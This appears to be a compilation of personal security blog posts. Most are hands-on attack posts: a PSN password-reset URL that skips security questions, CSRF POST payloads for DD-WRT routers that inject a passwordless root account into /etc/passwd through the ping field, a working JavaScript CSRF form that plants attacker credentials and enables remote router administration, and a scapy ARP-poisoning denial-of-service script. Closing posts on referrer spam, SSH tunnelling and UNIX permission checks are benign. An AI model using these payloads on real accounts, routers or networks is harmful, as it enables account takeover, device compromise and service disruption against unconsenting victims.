How to reset a Playstation Network password without knowing answers to the security questions or DoB

When you use the forgot password link on PSN, one of the following types of URLs will be sent to you:

https://account.sonyentertainmentnetwork.com/reg/account/validate-forgot-password-token!input.action?token=[TOKEN]&request_locale=en_US&service-entity=psn 

https://account.sonyentertainmentnetwork.com/liquid/external/validate-forgot-password-token!input.action?token=[TOKEN]&request_locale=en_US&service-entity=psn

Either of these link need you to know either the 'date of birth' or answer to the secret question.

To skip the verification step, you can try using the following URL(paste the token string sent to you in email):

https://account.sonyentertainmentnetwork.com/security/validate-password-reset-token!input.action?token=[TOKEN]&request_locale=en_US 

Worked for me :)

Attacking wireless routers running DD WRT

The previous post talks about CSRF attacks on DSL modems. A similar attack on routers with the dd wrt firmware is also possible. I will try a few different possibilities here which eventually lead to the attacker taking control of the router using a simple javascript hosted on another website.

All requests need to be made to the target "apply.cgi". Possible hosts can be 192.168.1.1, 192.168.0.1, 10.0.0.1, 10.0.1.1 and so on.


1. Enable remote http administration on port 8989

The following POST request needs to be made:

submit_button=Management&action=ApplyTake&remote_management=1&http_wanport=8989

2. Add a new user(outsider) to the system and set it's password as null
POST Request to add user every time the router reboots:

submit_button=Ping&action=Apply&submit_type=startup&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=echo+outsider%3A%3A0%3A0%3ARoot+User%2C%2C%2C%3A%2Ftmp%2Froot%3A%2Fbin%2Fsh+%3E%3E+%2Fetc%2Fpasswd

POST Request to instantly add user(gets erased if when router reboots, hence to be used with previous POST request):

submit_button=Ping&action=ApplyTake&submit_type=start&change_action=gozila_cgi&next_page=Diagnostics.asp&ping_ip=echo+outsider%3A%3A0%3A0%3ARoot+User%2C%2C%2C%3A%2Ftmp%2Froot%3A%2Fbin%2Fsh+%3E%3E+%2Fetc%2Fpasswd

3. Add a DDNS entry to obtain the public IP of the victim(incase the attack is targeted to a fixed public IP):
POST request if the DDNS provider is afraid.org:

submit_button=DDNS&action=ApplyTake&change_action=&submit_type=&ddns_enable=2&ddns_username_2=uname&ddns_passwd_2=passwrd&ddns_hostname_2=wrtvictim.net&ddns_wan_ip=0&ddns_force=1

* for different providers different values for the ddns_enable parameter can be tried. In the above case its afraid.org, username is uname, password is passed and the hostname is wrtvictim.net


Once an attacker has control over the router, other things can be done like setting up port forwarding rules, setting up a rogue DNS server for DHCP clients, setting it up as a VPN server/client, add access restrictions to prevent access to certain domains, setting up an identified host in the DMZ etc. Though I haven't tried yet, a modified firmware can also be uploaded on to the router using the upgrade functionality. If a connection over the remote port does not allow this, port forwarding can be setup to make the connection appear to originate from the LAN.

Attacking a DSL modem/router using a simple javascript

This is a known issue for a few years but its surprising that DSL modem/router manufacturers have still not fixed the issue(at least not mine ;)). My router's administration web server  accepts HTTP POST requests from a user with an authenticated session without validating them against any token or checking the referrer section in the HTTP header. Thus, the router can accept requests originating from a user's browser irrespective of whether the request was generated voluntarily by the user from the router's web interface or if an automated script stored on another website generated that request on the user's behalf. The latter one is the risky condition we are talking about.

I wrote a small proof of concept javascript to craft a POST request to a specific URL of the router's web server in order to open the router to allow remote administration. This URL also accepts the credentials used for connecting remotely. Hence, the malicious script successfully pushes the username and password of the attacker's choice, using the victim's authenticated session with the DSL router.

The above part is very easy to perform and the victim's modem configured to welcome remote connections over the public network. The challenge for the attacker now is to find the public IP address of the victim, otherwise the above actions are of no use. Some techniques are possible:

1. Push settings for DDNS into the DSL router's configuration
2. Host a listener online which logs incoming connections' IP addresses and make the above malicious script place a sample request to this listener.
3. Include additional script to connect to a service like whatismyip.com and fetch the public ip address and post it on some anonymous board online(a little difficult to achieve due to browser restrictions)

The first one is manageable if the attack is targeted to one particular individual. If the router reboots or jumps IP addresses, the attacker can constantly keep a track. There are many free DDNS services available online and the attacker can maintain anonymity too.

The second one risks the attacker being identified due to the ownership of the listener service. But multiple victims can be targeted and maintained.

The third option provides both, anonymity and unlimited victims, but is very difficult to achieve due to browser restrictions. I am still working on a sample javascript to achieve it but there are a couple of things holding me back:
a. Response from whatismyip.com or any other service cannot be accessed by a script running on another domain.
b. I haven't yet found an anonymous online board which I can use to post messages using automated scripts. This is mainly due to the use of CAPTCHA or some other human verification tool being used by these services.

 Another challenge is to guess the Private IP address of the DSL router, for the javascript to write configuration data successfully. The most common ones are 192.168.0.1, 192.168.1.1, 10.0.0.1, 10.0.1.1 and so on. All the most likely IP addresses can be targeted/brute forced. Finally, below is the script I wrote specifically for my router. It will vary depending on the model and make of the router.

<script type="text/javascript">
function post_to_url(router) {

method = "post";
var form = document.createElement("form");
    form.setAttribute("method", method);
    form.setAttribute("action", "http://" + router + "/remote_config");

//Post variables
        var userid = document.createElement("input");
        userid.setAttribute("type", "hidden");
        userid.setAttribute("name", "__AdminUserID");
        userid.setAttribute("value", "hacker");
        form.appendChild(userid);

        var password = document.createElement("input");
        password.setAttribute("type", "hidden");
        password.setAttribute("name", "__AdminPassword");
        password.setAttribute("value", "hackerpass");
        form.appendChild(password);

        var timeoutdisable = document.createElement("input");
        timeoutdisable.setAttribute("type", "hidden");
        timeoutdisable.setAttribute("name", "TimeOut_Disable");
        timeoutdisable.setAttribute("value", "on");
        form.appendChild(timeoutdisable);
 
        var enableremoteaccess = document.createElement("input");
        enableremoteaccess.setAttribute("type", "hidden");
        enableremoteaccess.setAttribute("name", "Enable_RemoteAccess");
        enableremoteaccess.setAttribute("value", "on");
        form.appendChild(enableremoteaccess);

    document.body.appendChild(form);
    form.submit();
}
</script>


The above script sets the POST parameters __AdminUserID, __AdminPassword, Timeout_Disable and Enable_RemoteAccess with the values of the attacker's choice and makes a POST request to the router's IP address. I have masked the actual parameters used by my DSL modem(for no reason at all ;)) but as long as you get the parameter names right, the attack surely works.

And the script can be called using the following:

<script>post_to_url("192.168.0.1")</script>

<script>post_to_url("192.168.1.1")</script>

<script>post_to_url("10.0.1.1")</script>


I also have a few wireless routers lying around with the dd-wrt firmware on them. Next, my goal is to test if a similar attack works on them too.
In conclusion, for this kind of an attack to work, there are numerous pre-conditions that might dictate the success or failure of such an attack:

1. Victim visits the malicious website
2. Victim has an authenticated session with the router's web interface
3. The modem has not changed its public IP address
4. The POST request contains the exact parameters required to make the change.

There can be more damaging effects of such an attack:

a. The DNS address is set to a malicious DNS server in the modem configuration
b. The ssid and network key of the router is modified
c. A denial of service attack is carried out by blocking access to certain public IPs/URLs on the internet
d. The dd-wrt firmware allows users to execute commands from the web interface, the attacker can craft an attack to run any command on the victim's router

Using cryptography as a protection from 'Referrer Spam'

I was recently looking at the analytics of my blog and found that for certain visits, the referrer was pointing to some spam websites. After a bit of testing I figured that the referrer section could be spoofed easily while making an HTTP request for any blog hosted by that provider. After some internet lookups, I learnt that the term for such an attack is 'Referrer Spam'. This could mean that someone with the right tools and wrong intent could modify the HTTP header to do two things:

         a. Spoof the referrer
         b. Blank out the referrer

Both of these are not beneficial for analytics or the referrer. One workaround to mitigate such spoofing can be by using cryptography for enforcing integrity checks to avoid feeding false data to the analytics engine. The idea is to encrypt the concatenation of the virtual path in the URL and the Hash of the data in the referrer section.

The following method can be followed:

Referrer Server:
1. Encrypt URL+Hash of data in 'Referrer' section using referrer's private key

Blog's Web Server:
1. Blog provider checks the referrer's section and checks if domain is known.
2. Reconstruct the virtual path by decrypting using referrer's public key and validate the hash with the data in 'Referrer' section.
3. If step 2 does not fail, display the content to user and log data to the analytics engine.

In the above method, symmetric keys can also be used, however, key renewal on a timely basis might be required.

The advantage of the above technique is that unknown referrers can be marked, separated and their IPs can be flagged if further processing of spam source is required.

Cons:
1. Attackers can cause a Denial of Service attack by overloading the Decryption section with junk data
2. Prior key exchange with 'known' referrers is required
3. All unknown referrers are considered as spammers/malicious unless further processing 'clears' them.

Simple ARP poison script in python

A quick python script to DoS a host on the network. It uses scapy and you can set default values in the script. The attack relies on ARP poisoning and the ARP entries on arp_dest_ip are flooded with a fake victim_mac. The target's IP address is specified by victim_ip.

Here's the script:

#!/usr/bin/python
#DoS.py
#Default target is 10.0.3.3
import sys
from scapy.all import *

try:
      if(sys.argv[1] == "-h"):
            print("Usage:")
           print("DoS [victim_ip] [arp_dest_ip] [arp_dest_mac] [victim_mac]")
           exit(0)
except IndexError:
      print("Attacking....")

x=ARP()
x.op=2
try:
      x.psrc=sys.argv[1] #SOURCE_IP
except IndexError:
      x.psrc="10.0.3.3"
try:
      x.hwsrc=sys.argv[4] #SOURCE_MAC
except IndexError:
      x.hwsrc="FF:FF:FF:FF:FF:FF" #Put a fake MAC address here
try:
      x.pdst=sys.argv[2] #DEST_IP
      x.hwdst=sys.argv[3] #DEST_MAC
except IndexError:
      x.pdst="10.0.3.1" #Usually contains the IP of the gateway
      x.hwdst="FF:FF:FF:AB:CD:EF" #Should contain the MAC of the IP defined as x.pdst

x.show()

sr(x,inter=0.0000000000000001,retry=-999999999,timeout=0.00000000000001)

Next I would want to automate most of the stuff above where minimum inputs would be required and other kind of logic where the attacker pauses attack if the target quits the network etc.

I am also thinking about how to thwart or raise an alert on such an attack...

P.S. I know scapy has pre-defined functions to conduct ARP attacks...I'm doing it manually just for the kicks...

Creating an SSH tunnel to a safe(r) network

This post will show how to establish an encrypted tunnel to another computer on a remote network. This is achieved using the port forwarding feature in SSH clients on UNIX and a proxy server running on the remote network(in this case 'polipo'). First, a proxy server is started on the remote network. In this case, polipo is listening on port 9000 for connections. It is set to listen on and accept from only the localhost. This way, even if the proxy server does not implement any kind of authentication, it is secure from requests originating from any other machine than the localhost.

Once the proxy server is up and listening for connections from the localhost, we establish a ssh tunnel with this server with the following configuration :

Local port : 81 (port that the browser uses as the proxy port)
Remote IP : localhost (since we have configured our proxy server to only listen on localhost)
Remote Port : 9000 (since the proxy server listens on port 9000)

this is achieved by running the ssh client using the following arguments :

ssh [user]@[remoteIP] -L 81:localhost:9000 -N

This is a stripped down method of using the tunnel. Compression can be used using the -C option or it can also be made to run in the background using the -f option. The -N option ensures that no remote commands are executed and only port forwarding is used.

When the above command is run, it will ask the user for login credentials of the remote server. Once it is successfully authenticated, all requests directed towards the localhost on port 81 will be forwarded using an encrypted tunnel, to the remote server on port 9000.

To test the above setup, modify the proxy settings of your browser to direct all requests to "localhost" on port 81(or any other forwarded port) for all protocols. You can try to load any website in the web browser now. If everything is working as expected, you should be able to surf the internet smoothly. To confirm if your traffic is routed through the remote server, you can compare the IP address using services using 'whatismyip.com" or something similar. This will only work if the remote server has a different public IP than the local machine.

The above setup is especially useful when:

1. Accessing financial or private information while on the move and using public or untrusted internet connections.
2. Accessing blocked content from behind a corporate network...i do not recommend this ;)

In both the above cases, you might have limited access to the remote server because of port blocking etc in effect so you i would be a good idea to ensure that the remote server is listening for SSH connections on a "safe" port (e.g. 443 or even 80) which will definitely be allowed through the firewall (this is what I do too..however i feel this technique will not work if all your web traffic is routed through a proxy server....port selection is another discussion in itself)


This technique can be used for many other things like routing only specific ports through a remote server e.g. skype calls, google talk, etc.

This content is strictly for educational purposes. Please confirm with your system administrators/supervisors if the above techniques are compliant with local policies before using them in any network.

UNIX Permission Analyzing Algorithm

UNIX permissions can be quite baffling. They are even more difficult to tackle with when they are needed to be analyzed using computer programs. Let us take one scenario where we need to analyze using computer programs if the permissions over a file are no more than Recommended or Permitted.Let the Recommended permission be 600(octal). This means Read and Write permissions only to the Owner, no more than that. If these permissions are analyzed using mathematical operators, the results will not always be correct. Let us have a look at different scenarios :

Scenario 1 : The permissions over the file is 400. Hence 400 < 600 results in True. And the Analysis is correct.

Scenario 2 : The permissions over the file is 500. Hence 500 < 600 results in True. The Analysis is incorrect in this case since 500 means Read and Execute Permissions to the Owner. We have however recommended that the owner should not be granted any other permission than Read and Write.

Hence, as seen in Scenario 2, UNIX permissions cannot be analyzed using mathematical operators.

To correctly analyze UNIX file permissions the following algorithm can be used :

1. Convert the textual form of the Recommended permission to binary.

eg. If the recommended permission is 600, the textual form would be rw------- . The binary of this would be 110000000.

2. Convert the binary of the Recommended permission to its inverted form. Call it RI (recommended inverted).

eg. If the binary is 110000000, the inverted form would be 001111111.

3. Take the textual form of the encountered file permission and convert it to its binary. Call it EP (encountered permission).

eg. If the encountered permission is r-x------ , the binary would be 101000000. This is 500 in Octal.

4. Do a Bit-wise Logical AND of the Encountered Permission(EP) with the Recommended Inverted(RI). EP (AND) RI.

eg. EP = 101000000 , RI = 001111111 , then EP (AND) RI => 101000000 AND 001111111. This gives a result of 001000000.

5. If the result has a '1' in any of its positions, the Encountered Permission is lesser stringent that the Recommended Permission. Furthermore, the exact permission that is not required can also be pin pointed using the location of the 1s in the result.

eg. If the result is 001000000, the permission that is not required is in the third position. Hence, revoking execute access over the file from the Owner will ensure compliance with the recommend permission.

Once again, the algorithm goes as follows :

1. Obtain the Recommended Inverted(RI).
2. Obtain the Encountered Permission(EP).
3. Perform Bit-wise Logical AND of EP with RI.
4. If result contains even a single 1, EP is lesser stringent than RI. If result contains all 0s, EP is no lesser stringent than RI.


Step 2 might require some more processing in case of permissions with sticky bit etc. We will have a look at such scenarios in my next post.....